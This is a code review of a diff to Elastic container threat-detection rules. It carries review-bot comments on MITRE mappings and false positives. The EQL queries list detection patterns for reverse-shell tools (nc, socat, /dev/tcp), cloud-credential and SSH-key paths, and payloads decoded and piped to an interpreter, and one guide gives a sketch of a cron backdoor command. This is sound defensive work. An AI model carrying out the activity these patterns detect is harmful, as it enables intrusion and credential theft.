Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
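Review bot: The mode list `process.args in ("4755", "755", "777", "0777", "444", "+x", "a+x")` includes `"444"`, which is read-only for everyone and never sets an execute bit, so it contradicts the description "add the execute permission to a file" and will produce alerts the guide cannot explain; drop it, or add a comment stating why a read-only mode is interesting here. `"4755"` additionally sets the setuid bit, which is a stronger signal than plain `755` and could be called out in a comment or a dedicated rule. The `note` also opens with an empty `## Setup` heading immediately followed by `## Triage and analysis`, the same pattern as in the netcat rule, and unlike that rule the query has no `host.os.type == "linux"` filter.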
@@ -109,22 +117,45 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.011" -name = "Lua" -reference = "https://attack.mitre.org/techniques/T1059/011/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" + + [[rule.threat.technique.subtechnique]] + name = "Lua" + id = "T1059.011" + reference = "https://attack.mitre.org/techniques/T1059/011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" 
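Review bot: The rebuilt threat block is laid out differently from every other rule file in this patch: the tables are indented, `[rule.threat.tactic]` precedes `[[rule.threat.technique]]`, and `name` is listed before `id`, whereas the other files use column-0 tables with the tactic table last and `id` first. TOML ignores the indentation, but the inconsistent ordering makes future diffs noisy, so align it with the others (tactic last, `id` before `name`, no indent). Separately, the hunk adds a Command and Control mapping (T1071.001 Web Protocols) to a rule that detects an interactive interpreter launch; unless the query, which lies outside this hunk, also matches outbound web traffic, the tactic overstates what the detection observes and the `Tactic: Command and Control` tag added above should go with it.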
diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml
index 118bdfd306b..f2710c97edc 100644
--- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml
+++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/10"
 
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,16 @@ references = [
 risk_score = 21
 rule_id = "f246e70e-5e20-4006-8460-d72b023d6adf"
 severity = "low"
-tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -106,35 +115,25 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.002" -name = "At" -reference = "https://attack.mitre.org/techniques/T1053/002/" - [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique.subtechnique]] -id = "T1053.006" -name = "Systemd Timers" -reference = "https://attack.mitre.org/techniques/T1053/006/" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1546" @@ -154,6 +153,21 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" 
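Review bot: The subtechniques T1053.002 (At), T1053.006 (Systemd Timers) and T1543.002 (Systemd Service) are dropped from the Persistence entry, and the Privilege Escalation entry in the next hunk only re-adds T1543, T1053 and T1053.003; if the query, which lies outside this hunk, still watches systemd unit or timer paths, the mapping now under-describes what the rule catches. Confirm the removals reflect a deliberate narrowing of the query, otherwise keep the systemd subtechniques under T1543 and T1053. T1037 Boot or Logon Initialization Scripts is added in their place; it is only justified if the query covers rc.local or init-script paths, which is worth a one-line `# covers /etc/rc.local and init.d writes` style note in the rule description so the mapping is traceable.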
@@ -168,3 +182,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/"
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1053.003"
+name = "Cron"
+reference = "https://attack.mitre.org/techniques/T1053/003/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml
index 1458b7ed0b3..a177a35115c 100644
--- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,15 @@ In containerized environments, SSH keys facilitate secure access, but adversarie
 risk_score = 47
 rule_id = "f7769104-e8f9-4931-94a2-68fc04eadec3"
 severity = "medium"
-tags = ["Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Lateral Movement",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -86,3 +94,31 @@ reference = "https://attack.mitre.org/techniques/T1098/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+[[rule.threat.technique]]
+id = "T1563"
+name = "Remote Service Session Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1563.001"
+name = "SSH Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/001/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml
new file mode 100644
index 00000000000..4e79c7957c8
--- /dev/null
+++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml
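Review bot: The new Lateral Movement entry maps T1563.001 SSH Hijacking, but an authorized_keys modification is key planting, not hijacking of an existing SSH session or agent socket; T1098.004, already present per the context line above the hunk, is the technique the rule actually observes, and T1021.004 SSH describes the later logon the key enables rather than this event. Keep Lateral Movement only if the query, which lies outside this hunk, also captures the inbound SSH use of the planted key; otherwise drop this entry together with the `Tactic: Lateral Movement` tag added in the previous hunk, so tactic tags reflect what the detection sees rather than what may follow.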
@@ -0,0 +1,162 @@ +[metadata] +creation_date = "2026/02/10" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the execution of the echo/printf command to write data to potential persistence files, decode base64/32/16 and +hex content or establish connections to a potential C2. The echo/printf commands are used to display a line of text or write data +to a file. Threat actors may abuse the echo/printf commands to write data to files or file descriptors that are executed (by +other processes or services) to establish persistence or escalate privileges. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Suspicious Echo or Printf Execution Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Suspicious Echo or Printf Execution Detected via Defend for Containers + +This rule flags interactive shell commands that invoke echo or printf with patterns used to write or stage data into sensitive paths, decode encoded payloads, or reach out via /dev/tcp. Attackers use these lightweight built-ins to avoid dropping tools while creating persistence or privilege escalation by modifying cron, rc.local, sudoers, ld.so preload, or SSH authorized_keys. In a container, a common pattern is execing into a pod and running `sh -c 'printf | base64 -d > /etc/cron.d/job; chmod +x …'` to implant a scheduled backdoor. 
+ +### Possible investigation steps + +- Review the full command line, parent/child process tree, and session metadata to determine who initiated the interactive exec and whether it was an expected administrative action. +- Extract any encoded strings or redirected output from the command and safely decode/pretty-print it to identify dropped scripts, keys, cron entries, or additional staging commands. +- Inspect the referenced destination paths (and their symlink targets) for recent modifications, unexpected permissions/ownership changes, and persistence artifacts such as cron jobs, rc.local edits, ld.so preload configs, sudoers changes, or SSH authorized_keys additions. +- Determine whether the write target resides on a mounted volume shared with the host or other pods, and assess blast radius by checking for the same artifact across replicas/namespaces and CI/CD deployment history. +- Correlate around the execution time for follow-on activity such as outbound connections (including /dev/tcp usage), subsequent interpreter launches, or cleanup actions, and contain by isolating/pausing the workload if malicious behavior is confirmed. + +### False positive analysis + +- An administrator interactively execs into a container during troubleshooting and uses `echo`/`printf` with redirection (and possibly `chmod`) to make a temporary or emergency change in paths like `/etc/profile`, `/etc/update-motd.d`, `/etc/ssh*`, or `~/.ssh/*` to restore access or correct misconfiguration. +- A developer interactively execs into a container to create and run a short diagnostic artifact by using `echo`/`printf` to write into `/tmp` or `/dev/shm`, decode embedded `base64`/hex content, or validate network reachability via `/dev/tcp`, which can resemble staging/persistence behavior. 
+ +### Response and remediation + +- Isolate the affected pod/container by removing it from service (scale to zero or cordon/deny ingress-egress) and, if needed, pause it to preserve the filesystem state before it can overwrite or delete staged artifacts. +- Capture and preserve evidence by exporting the full shell command string and taking a filesystem snapshot/copy of any touched paths such as `/etc/cron*`, `/etc/rc.local`, `/etc/init.d`, `/etc/ld.so*`, `/etc/sudoers*`, and `~/.ssh/authorized_keys`, plus any files created in `/tmp`, `/var/tmp`, or `/dev/shm`. +- Eradicate persistence by removing unauthorized cron entries, rc.local/init scripts, sudoers/ld.so preload modifications, and injected SSH keys, then rotate any exposed credentials and redeploy the workload from a known-good image rather than “cleaning” the live container. +- Recover safely by rebuilding the image with patched dependencies, rolling out a fresh deployment, and validating that no replicas or shared volumes contain the same dropped scripts/keys or modified configuration files. +- Escalate immediately to incident response if the command decodes payloads (base64/base32/hex), writes into system startup/auth paths, invokes an interpreter via a pipe (e.g., `| sh/python/perl/php`), or uses `/dev/tcp` for outbound connectivity, as these indicate active staging or C2 behavior. 
+- Harden against recurrence by restricting interactive exec access, enforcing read-only root filesystems and least-privilege mounts, blocking writes to sensitive paths via policy, and adding egress controls to prevent `/dev/tcp`-style callbacks.""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 73 +rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where event.type == "start" and event.action == "exec" and process.interactive == true and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +process.args in ("-lc", "-c", "-cl") and process.args like ("*echo *", "*printf *") and +process.args like ( + "*/etc/cron*", "*/etc/rc.local*", "*/dev/tcp/*", "*/etc/init.d*", "*/etc/update-motd.d*", + "*/etc/ld.so*", "*/etc/sudoers*", "*base64 *", "*base32 *", "*base16 *", "*/etc/profile*", + "*/dev/shm/*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*" , "*~/.ssh/*", "*xxd *", + "*/etc/shadow*", "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* ~/*", "* /home/*", + "* /run/*", "* /var/run/*", "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*busybox*", + "*/var/www/*", "*>*", "*;*", "*chmod *", "*rm *", "*openssl enc*" +) and container.id like "?*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = 
"https://attack.mitre.org/techniques/T1053/003/" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml new file mode 100644 index 00000000000..eb31c917b85 --- /dev/null 
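Review bot: At `severity = "high"` with `risk_score = 73` the second `process.args like (...)` list is very permissive: `"*>*"`, `"*;*"`, `"*chmod *"`, `"*rm *"` and `"* /tmp/*"` mean any interactive `sh -c` that contains echo or printf plus a redirect, a semicolon or a temp path fires, which is exactly the administrative troubleshooting the rule's own False positive analysis section describes. Consider dropping the generic shell-syntax patterns (`"*>*"`, `"*;*"`) or gating them behind the sensitive-path patterns, and lowering severity until the false-positive rate is known. The pattern `"* /dev/shm/* "` carries a trailing space that looks unintended, since it only matches when another token follows the path. The three `[[rule.threat]]` entries repeat T1543/T1053 under Persistence, Privilege Escalation and Execution, which is valid ATT&CK but is worth stating in the PR so the next editor does not collapse them.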
+++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml 
@@ -0,0 +1,284 @@ +[metadata] +creation_date = "2026/02/06" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the exploitation of a web server through the execution of a suspicious process by common web server +user accounts. Attackers may upload a web shell to a web server to maintain access to the system. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Web Server Exploitation Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Web Server Exploitation Detected via Defend for Containers + +This rule flags Linux container activity where a web server (or typical web-service account) executes a suspicious process, a strong indicator of web app exploitation rather than normal request handling. It matters because this pattern commonly marks initial foothold and post-exploitation execution that can lead to persistence and lateral movement from the service container. A typical attacker flow drops a web shell or abuses RCE to launch `sh -c` and pull or run a secondary payload (e.g., reverse shell). + +### Possible investigation steps + +- Capture the full executed command line and decode/normalize any obfuscation (base64, hex, URL encoding) to determine the operator intent and any payload retrieval or reverse-shell behavior. 
+- Correlate the execution timestamp with web access/error logs and ingress/WAF events to identify the triggering request path, parameters, and source IP/user-agent indicating RCE or web-shell invocation. +- Inspect recent file and permission changes in the container’s application and web directories (including temp and upload paths) to identify newly dropped scripts/binaries, cron entries, or modified server configs. +- Review container and orchestration context (image tag/digest, recent deploys, exec sessions, and Kubernetes events) to determine whether the activity aligns with a legitimate rollout or represents in-container compromise. +- Check network telemetry for the container around the event for suspicious outbound connections, DNS lookups, or downloads, then pivot to any contacted hosts to assess command-and-control or staging infrastructure. + +### False positive analysis + +- A web application or server-side script running under the web-service account legitimately invokes `sh -c` (e.g., to run maintenance tasks like log rotation, cache rebuilds, file conversions, or templating/asset compilation) from a web directory such as `/var/www/*`, causing the web server to spawn a shell child process. +- During container startup or a deployment/health-check routine, the web server process launches a shell via `sh -c` to perform initialization (e.g., environment substitution, dynamic configuration generation, permission fixes, or calling bundled helper scripts), which can resemble exploitation when the parent is a web server and the child is a shell. + +### Response and remediation + +- Immediately isolate the affected container/pod from inbound and outbound traffic (quarantine namespace/security group or apply a deny-all NetworkPolicy) and stop the workload to prevent further `sh -c` execution and potential C2. 
+- Preserve evidence by exporting the container filesystem and logs (web access/error logs, application logs, and process output) and capture the exact shell command string and any downloaded payloads or newly created files in web roots, temp, and upload directories. +- Eradicate by removing any identified web shells/backdoors and reverting unauthorized changes, then rebuild and redeploy the service from a known-good image digest while rotating secrets exposed to the container (service tokens, database creds, API keys). +- Recover by validating application integrity and behavior post-redeploy (no unexpected shell spawns, no abnormal outbound connections, clean health checks) and monitor the previously contacted IPs/domains for further callbacks from other workloads. +- Escalate to incident response and platform security immediately if the shell command indicates payload retrieval, reverse shell activity, credential access, or if similar `sh -c` executions are observed across multiple containers/namespaces. 
+- Harden by removing shell binaries from runtime images where feasible, enforcing non-root and read-only filesystems, restricting egress to required destinations only, disabling risky interpreter execution paths in the web app, and adding WAF/RCE protections for the identified vulnerable endpoint.""" +risk_score = 73 +rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where event.type == "start" and event.action == "exec" and process.parent.interactive == false and +container.id like "?*" and ( + process.parent.name in ( + "nginx", "apache2", "httpd", "caddy", "mongrel_rails", "uwsgi", "daphne", "httpd.worker", "flask", + "php-cgi", "php-fcgi", "php-cgi.cagefs", "lswsctrl", "varnishd", "uvicorn", "waitress-serve", "starman" + ) or + process.parent.name like ("php-fpm*", "gunicorn*", "*.cgi", "*.fcgi") or + (process.parent.name like "ruby*" and process.parent.args like~ ("*puma*", "*rails*", "*passenger*")) or + (process.parent.name like "python*" and process.parent.args like~ ( + "*hypercorn*", "*flask*", "*uvicorn*", "*django*", "*app.py*", "*server.py*", "*wsgi.py*", "*asgi.py*" + )) or + (process.parent.name like "perl*" and process.parent.args like~ "*plackup*") or + (process.parent.name == "node" and process.parent.args like~ ( + "*next start*", "*--port*", "*PORT=*", "*HOST=*", "*0.0.0.0*", "*/dist/*.js*", "*/build/*.js*", "*/server/*.js*", + "*/app/*.js*","*/apps/*/*.js*", "*/index.js*", "*/main.js*", "*/srv/*", "*/opt/*", "*/var/www/*" + ) and + not process.parent.args like ("/opt/cursor-agent/*", "/home/*/*", "/root/*", "/opt/vscode-server/*", "/usr/lib/node_modules/openclaw/dist/index.js") + ) or + (process.parent.name 
== "java" and process.parent.args like~ ( + /* Tomcat */ + "org.apache.catalina.startup.Bootstrap", "-Dcatalina.base=*", + + /* Jetty */ + "org.eclipse.jetty.start.Main", "-Djetty.home=*", + + /* WildFly / JBoss */ + "org.jboss.modules.Main", "-Djboss.home.dir=*", + + /* WebLogic */ + "weblogic.Server", "-Dweblogic.Name=*", "*weblogic-launcher.jar*", + + /* WebSphere traditional + Liberty */ + "com.ibm.ws.runtime.WsServer", "com.ibm.ws.kernel.boot.cmdline.Bootstrap", + + /* GlassFish */ + "com.sun.enterprise.glassfish.bootstrap.ASMain", + + /* Resin */ + "com.caucho.server.resin.Resin", + + /* Spring Boot */ + "org.springframework.boot.loader.*", + + /* Quarkus */ + "*quarkus-run.jar*", "io.quarkus.runner.GeneratedMain", + + /* Micronaut */ + "io.micronaut.runtime.Micronaut", + + /* Dropwizard */ + "io.dropwizard.cli.ServerCommand", + + /* Play */ + "play.core.server.ProdServerStart", + + /* Helidon */ + "io.helidon.microprofile.server.Main", "io.helidon.webserver*", + + /* Vert.x */ + "io.vertx.core.Launcher", + + /* Keycloak */ + "org.keycloak*", + + /* Apereo CAS */ + "org.apereo.cas*", + + /* Elasticsearch */ + "org.elasticsearch.bootstrap.Elasticsearch", + + /* Atlassian / Gerrit */ + "com.atlassian.jira.startup.Launcher", "*BitbucketServerLauncher*", "com.google.gerrit.pgm.Daemon", + + /* Solr */ + "*-Dsolr.solr.home=*" + ) + ) +) and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and +process.args in ("-c", "-cl", "-lc") and ( + process.args like ( + /* Suspicious Paths */ + "* /tmp/* ", "* /var/tmp/* ", "* /dev/shm/*", "* /var/www/*", "* /run/*", "* /var/run/*", + + /* Interpreter Execution */ + "*python* -c*", "*php* -r*", "*perl* -e*", "*ruby* -e*", "*lua* -e*", "*node * -e *", + + /* Encoding / Decoding */ + "*base64 -*d*", "*|*base64 *", "*xxd *", "*openssl*enc * -d *", + + /* Reverse Shells */ + "*netcat *", "* nc *", "*ncat *", "*/dev/tcp*", "*/dev/udp/*", " *socat *", "*openssl*s_client *", "*stty*raw*-echo*", 
+ + /* File Access */ + "*>*/etc/cron*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*", "*~/.ssh/*", "*/etc/shadow*", "*/etc/passwd*", "*chpasswd*", + + /* AWS Credentials */ + "*aws_access_key_id*", "*aws_secret_access_key*", "*aws_session_token*", "*accesskeyid*", "*secretaccesskey*", + "*access_key*", "*.aws/credentials*", "*/.aws/config*", + + /* Azure Credentials */ + "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", "*AZURE_FEDERATED_TOKEN_FILE*", + "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*", "*/.azure/*", + "*/run/secrets/azure/*", + + /* GCP Credentials */ + "*/.config/gcloud/*", "*application_default_credentials.json*", "*type: service_account*", + "*client_email*", "*private_key_id*", "*private_key*", "*/run/secrets/google/*", "*GOOGLE_APPLICATION_CREDENTIALS*", + + /* Misc. Cloud */ + "*/.docker/config.json*", "*/.npmrc*", "*/secrets/kubernetes.io/serviceaccount/*", + + /* Helpers */ + "*nohup*", "*setsid *", "*timeout *sh -c *", "*disown*", "*env *sh *-c*", + + /* Miscellaneous */ + "*echo *", "*chattr *", "*busybox *", "*#!*", "*chmod +x *", "*chmod 777*", + + /* Decompression */ + "*gzip -*d *", "*bzip2 -*d *", "*xz -*d *", "*tar -*x*", + + /* Path Traversal */ + "*../../../*etc/*", "*/.../*", "*../../../*home/*/*", "*../../../*root/*", + + "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*ruby*", "*|*node*", "*|*lua*", "*|*busybox*" + ) or + ( + process.args like ("*wget *", "*curl *") and ( + ( + process.args like~ ("* -o *", "* --output*", "* -o- *") and + process.args regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" + ) or + ( + process.args like ("*http://*", "*https://*") and + process.args like ( + "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* /var/www/*", "* ~/*", + "* /home/*", "* /run/*", "* /var/run/*" + ) + ) + ) + ) +) and +not ( + (process.parent.name == "nginx" and process.args like ("chmod 777 /etc/resty-*", "resty*")) or + (process.parent.name == "apache2" and ( + 
process.args in ( + "/usr/local/bin/php -r 'echo phpversion();'", + "/usr/local/bin/php -r 'echo phpversion();'", + "/usr/bin/php -r 'echo phpversion();'" + ) or + process.args like """bash -c "( /home/*/apps/richdocumentscode/collabora/Collabora_Online.AppImage*""" + ) + ) or + (process.parent.name like "php-fpm*" and process.args in ( + "/usr/bin/php -r 'echo phpversion();'", + "/usr/bin/php -r 'echo phpversion();'", + "php -r 'print_r(phpversion());'", + "chattr -i -a /usr/local/virtualizor/license2.php" + ) + ) or + (process.parent.name == "php-cgi" and process.args like ( + "nohup php /home/*/public_html/lockindex.php index.php >/dev/null 2>&1 &", + "nohup php /home/*/public_html/wp-content/* >> /dev/null 2>&1 &", + "nohup php /home/*/public_html/wp-includes/* >> /dev/null 2>&1 &", + "nohup php /home/*/public_html/*/wp-content/* >> /dev/null 2>&1 &" + ) + ) +) +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Persistence" +id = "TA0003" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application 
